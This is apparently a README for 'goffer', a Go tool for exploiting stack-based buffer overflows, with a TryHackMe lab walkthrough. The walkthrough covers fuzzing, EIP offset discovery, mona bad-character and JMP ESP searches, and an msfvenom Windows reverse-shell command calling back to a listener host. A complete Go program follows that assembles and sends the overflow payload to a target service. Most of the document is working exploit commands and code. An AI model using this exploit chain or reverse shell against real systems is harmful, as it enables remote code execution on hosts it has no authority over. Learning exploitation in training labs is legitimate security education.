souvikhaldar/goffer
Goffer

A tool for finding and exploiting stack-based buffer overflow vulnerabilities in insecure network services (fuzzing, EIP offset discovery, and payload delivery). Written in Go.

Installation

  1. Install Go.
  2. go get github.com/souvikhaldar/goffer

Steps for the TryHackMe buffer overflow preparation room:

YouTube link for the steps below

  1. Set the working directory in Immunity Debugger: !mona config -set workingfolder c:\mona\%p
  2. Fuzz the service with increasing buffer sizes until it crashes: goffer fuzz -i 10.10.130.130 -p 1337 -c "OVERFLOW1 "
  3. Find the offset at which EIP is overwritten. This sends a 2100-byte cyclic pattern; the value that lands in EIP after the crash identifies the offset: goffer offset -i 10.10.130.130 -l 2100 -p 1337 -c "OVERFLOW1 "
  4. Generate a byte array to find bad characters (\x00 is excluded from the start, since it terminates C strings): !mona bytearray -b "\x00"
  5. Compare the generated byte array with the contents of the stack at the ESP value shown after the crash, e.g.: !mona compare -f c:\mona\vulnserver\bytearray.bin -a 00C0F9C8. Every byte mona reports as corrupted is a bad character: add it to the -b list, regenerate the array, resend, and repeat until mona reports the stack contents as unmodified.
  6. Check which modules have all protections (Rebase, SafeSEH, ASLR, DEP) turned off: !mona modules
  7. Find the address of a JMP ESP instruction in module xyz (one with protections off) that contains none of the bad characters: !mona jmp -r esp -cpb "\x00" -m xyz
  8. Set a breakpoint at that instruction's address and put the address, byte-reversed (little-endian), into EIP to confirm that execution reaches the JMP ESP.
  9. Now place the shellcode on the stack (starting at ESP), prepended with NOPs. You can use the following msfvenom command to create a Windows reverse shell with the bad characters found in step 5 excluded: msfvenom -p windows/shell_reverse_tcp LHOST=10.9.3.249 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f hex
     then use the following goffer command to put the shellcode on the stack and the JMP ESP address into EIP. -a is the offset from step 3, --eip is the JMP ESP address with its bytes reversed (af115062 for 625011AF), and --esp is the hex shellcode from the msfvenom output (eg.): goffer send -i 10.10.101.55 -p 1337 -c "OVERFLOW1 " -a 1978 --eip af115062 --esp <hex shellcode from msfvenom>
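As an added example (not goffer's own code), the following Go program shows what steps 3, 5 and 9 do on the wire: it generates the cyclic pattern, turns the EIP value seen in Immunity back into the offset, checks the shellcode for leftover bad characters, and assembles prefix + padding + little-endian JMP ESP address + NOP sled + shellcode. The JMP ESP address 0x625011AF is the one the `--eip af115062` above corresponds to; the EIP value 0x6F43396E, the 4-byte INT3 stand-in for shellcode, and the target address are assumptions for illustration.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"net"
	"os"
	"time"
)

// cyclicPattern returns n bytes of the Metasploit-style pattern
// ("Aa0Aa1...Aa9Ab0..."). Every 4-byte window is unique within the
// first 20280 bytes, so the value landing in EIP pins down the offset.
func cyclicPattern(n int) []byte {
	var b bytes.Buffer
	for b.Len() < n {
		for u := byte('A'); u <= 'Z'; u++ {
			for l := byte('a'); l <= 'z'; l++ {
				for d := byte('0'); d <= '9'; d++ {
					b.Write([]byte{u, l, d})
				}
			}
		}
	}
	return b.Bytes()[:n]
}

// patternOffset converts the EIP value displayed by the debugger (e.g. 0x6F43396E)
// back into the little-endian bytes that overwrote the saved return address and
// locates them in the pattern. Returns -1 if the value is not in the pattern.
func patternOffset(patternLen int, eip uint32) int {
	needle := make([]byte, 4)
	binary.LittleEndian.PutUint32(needle, eip)
	return bytes.Index(cyclicPattern(patternLen), needle)
}

// findBadChars returns every byte from bad that still appears in shellcode.
// A non-empty result means the msfvenom -b list was incomplete.
func findBadChars(shellcode, bad []byte) []byte {
	var found []byte
	for _, c := range bad {
		if bytes.IndexByte(shellcode, c) >= 0 {
			found = append(found, c)
		}
	}
	return found
}

// buildPayload assembles the final buffer:
// prefix + 'A'*offset + JMP ESP address (little-endian) + NOP sled + shellcode.
func buildPayload(prefix string, offset int, jmpESP uint32, nops int, shellcode []byte) []byte {
	var buf bytes.Buffer
	buf.WriteString(prefix)
	buf.Write(bytes.Repeat([]byte{'A'}, offset))
	eip := make([]byte, 4)
	binary.LittleEndian.PutUint32(eip, jmpESP) // 0x625011AF goes out as af 11 50 62
	buf.Write(eip)
	buf.Write(bytes.Repeat([]byte{0x90}, nops))
	buf.Write(shellcode)
	return buf.Bytes()
}

// sendPayload connects to the service, reads its banner, and writes the buffer
// followed by a newline, which is how the OVERFLOW commands are terminated.
func sendPayload(addr string, payload []byte) error {
	conn, err := net.DialTimeout("tcp", addr, 5*time.Second)
	if err != nil {
		return err
	}
	defer conn.Close()
	_ = conn.SetReadDeadline(time.Now().Add(2 * time.Second))
	banner := make([]byte, 1024)
	if n, err := conn.Read(banner); err == nil {
		fmt.Printf("banner: %q\n", banner[:n])
	}
	msg := append(append([]byte{}, payload...), '\n')
	_, err = conn.Write(msg)
	return err
}

func main() {
	// Assumed lab values: offset 1978, JMP ESP at 0x625011AF, EIP 0x6F43396E
	// after the pattern crash. The shellcode is a constructed INT3 stand-in,
	// not real msfvenom output.
	target := "10.10.101.55:1337"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}
	bad := []byte{0x00, 0x07, 0x2e, 0xa0}
	shellcode, _ := hex.DecodeString("cccccccc")
	if found := findBadChars(shellcode, bad); len(found) > 0 {
		fmt.Fprintf(os.Stderr, "shellcode still contains bad chars: % x\n", found)
		os.Exit(1)
	}
	fmt.Printf("offset for EIP 6F43396E: %d\n", patternOffset(2100, 0x6F43396E))
	payload := buildPayload("OVERFLOW1 ", 1978, 0x625011AF, 16, shellcode)
	if err := sendPayload(target, payload); err != nil {
		fmt.Fprintln(os.Stderr, "send failed:", err)
	}
}
```

Run it as `go run main.go 10.10.101.55:1337` against a lab target only. The NOP sled absorbs small differences in where ESP points after the jump; the badchar check is the guard that catches an incomplete `-b` list before a truncated payload is sent.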

Steps for solving vulnserver with goffer

Using Goffer for hacking vulnserver

About

Perform buffer overflow vuln testing and exploit